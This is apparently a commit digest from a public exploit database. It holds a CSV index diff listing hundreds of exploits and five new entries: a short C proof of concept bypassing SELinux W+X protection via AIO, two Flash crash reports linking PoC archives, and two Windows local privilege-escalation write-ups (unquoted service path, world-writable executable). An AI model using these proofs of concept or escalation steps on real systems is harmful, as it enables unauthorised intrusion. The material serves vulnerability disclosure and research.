DB: 2016-09-24

5 new exploits

EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion
EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion

WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection
WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)

Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)

Adobe Acrobat Reader 7<9 - U3D Buffer Overflow
Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow

Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)

Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)
Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)

Adobe Flash - Crash When Freeing Memory After AVC decoding

Adobe Flash - Video Decompression Memory Corruption

Linux - SELinux W+X Protection Bypass via AIO

Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation

Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation

Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service
Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service

Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities
Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities

Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass
Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass

Microsoft Excel 95<2004 - Malformed Graphic File Code Execution
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution

Git-1.9.5 - ssh-agent.exe Buffer Overflow
Git 1.9.5 - ssh-agent.exe Buffer Overflow

Skybox Platform <=7.0.611 - Multiple Vulnerabilities
Skybox Platform <= 7.0.611 - Multiple Vulnerabilities

SOLIDserver <=5.0.4 - Local File Inclusion
SOLIDserver <= 5.0.4 - Local File Inclusion

WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities
WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)

Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)

files.csv

@@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port
 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
 5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0
 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
-5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
+5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0
 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
@@ -9332,7 +9332,7 @@ id,file,description,date,author,platform,type,port
 9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0
 9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0
 9949,platforms/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0
-9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
+9950,platforms/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129
 9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
@@ -18317,6 +18317,7 @@ id,file,description,date,author,platform,type,port
 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0
 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0
 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0
+40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0
 21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0
 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0
 21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local,0
@@ -18329,6 +18330,7 @@ id,file,description,date,author,platform,type,port
 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0
 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
+40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0
 21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@@ -18393,6 +18395,7 @@ id,file,description,date,author,platform,type,port
 21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0
 21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0
 21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify - Buffer Overflow",2001-09-03,foo,hp-ux,local,0
+40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0
 21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
 21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0
 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0
@@ -18438,6 +18441,7 @@ id,file,description,date,author,platform,type,port
 21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
+40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0
 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
 21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",multiple,remote,0
 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0
@@ -18506,6 +18510,7 @@ id,file,description,date,author,platform,type,port
 21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0
 21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0
 21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0
+40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0
 21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote,0
 21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0
 21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0
@@ -19485,7 +19490,7 @@ id,file,description,date,author,platform,type,port
 22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
 22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
 22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
-40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
+40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
@@ -23911,7 +23916,7 @@ id,file,description,date,author,platform,type,port
 26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0
 26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
-26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
+26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
 26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
@@ -34693,7 +34698,7 @@ id,file,description,date,author,platform,type,port
 38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0
 38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0
 38335,platforms/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0
-38336,platforms/windows/dos/38336.py,"Git-1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
+38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
 38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
 38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80
 38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
@@ -36000,7 +36005,7 @@ id,file,description,date,author,platform,type,port
 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443
 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
-39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0
@@ -36086,7 +36091,7 @@ id,file,description,date,author,platform,type,port
 39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
 39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
 39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
-39809,platforms/windows/local/39809.cs,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
+39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
 39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0

platforms/linux/dos/40419.c

@@ -0,0 +1,47 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=854
+
+SELinux has a set of permissions that can be used to prevent processes from creating executable
+memory mappings that contain data controlled by the process (PROCESS__EXECMEM, PROCESS__EXECHEAP, ...).
+These permissions, when applied correctly, make exploitation of memory corruption issues somewhat more
+difficult and much more annoying.
+
+When a process tries to map memory using sys_mmap_pgoff(), vm_mmap_pgoff() is called, which first
+performs the LSM security check by calling security_mmap_file() and then calls do_mmap_pgoff(), which
+takes care of the rest and does not rerun the same security check.
+
+The syscall handler for io_setup() calls ioctx_alloc(), which calls aio_setup_ring(), which allocates
+memory via do_mmap_pgoff() - the method that doesn't contain the security check.
+
+aio_setup_ring() only requests that the memory is mapped as PROT_READ | PROT_WRITE; however, if the
+process has called personality(READ_IMPLIES_EXEC) before, this will actually result in the creation
+of a memory mapping that is both writable and executable, bypassing the SELinux restriction.
+
+To verify: (note: I actually tested this without SELinux since the code looks pretty straightforward
+and I don't want to figure out how to set up SELinux rules)
+
+$ cat > iosetup.c
+*/
+
+#define _GNU_SOURCE
+#include <linux/aio_abi.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <err.h>
+#include <sys/personality.h>
+
+int main(void) {
+  aio_context_t ctx;
+  personality(READ_IMPLIES_EXEC);
+  if (syscall(__NR_io_setup, 1, &ctx))
+    err(1, "io_setup");
+  while (1) pause();
+}
+
+/*
+$ gcc -o iosetup iosetup.c
+$ ./iosetup &
+[1] 4949
+$ cat /proc/4949/maps | grep aio
+7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330                   /[aio] (deleted)
+*/

platforms/multiple/dos/40420.txt

@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=857
+
+The attached fuzz file causes memory corruption when decompressing embedded video content. 
+
+Fixed in the September update
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40420.zip

platforms/multiple/dos/40421.txt

@@ -0,0 +1,9 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=859
+
+There is a crash when the AVC decoder attempts to free memory, likely indicating memory corruption.
+
+Fixed in the September update
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40421.zip

platforms/windows/local/40417.txt

@@ -0,0 +1,60 @@
+# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
+# Date: 23/09/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Vendor Homepage: http://www.wisecleaner.com
+# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
+# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
+# Tested on: Windows 7 x86
+# Shout-out to carbonated and ozzie_offsec
+
+
+1. Description:
+
+Two seperate instances of unquoted service path privilege escalation has been discovered. The first instance is within Wise Care 365 4.27 which installs a vulnerable service entitled WiseBootAssistant. The second vulnerability exists when Wise Disk Cleaner 9.29 installs SpyHunter 4. Both of these services run with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
+
+2. Proof
+
+Wise Disk Cleaner 9.29
+
+C:\>sc qc WiseBootAssistant
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WiseBootAssistant
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Wise\Wise Care 365\BootTime.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wise Boot Assistant
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+SpyHunter 4
+
+C:\>sc qc "SpyHunter 4 Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SpyHunter 4 Service
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
+        LOAD_ORDER_GROUP   : Base
+        TAG                : 0
+        DISPLAY_NAME       : SpyHunter 4 Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their
+code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
+

platforms/windows/local/40418.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
+# Date: 23/09/2016
+# Exploit Author: Tulpa
+# Contact: tulpa@tulpa-security.com
+# Author website: www.tulpa-security.com
+# Vendor Homepage: http://www.zortam.com/
+# Software Link: http://www.zortam.com/download.html
+# Version: Software Version 21.15
+# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
+# Shout-out to carbonated and ozzie_offsec
+
+1. Description:
+
+Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.
+
+2. Proof
+
+C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
+C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
+                                                     NT AUTHORITY\SYSTEM:(ID)F
+                                                     BUILTIN\Administrators:(ID)F
+                                                     BUILTIN\Users:(ID)R
+
+
+3. Exploit:
+
+Simply replace zmmspro.exe and wait for execution.
+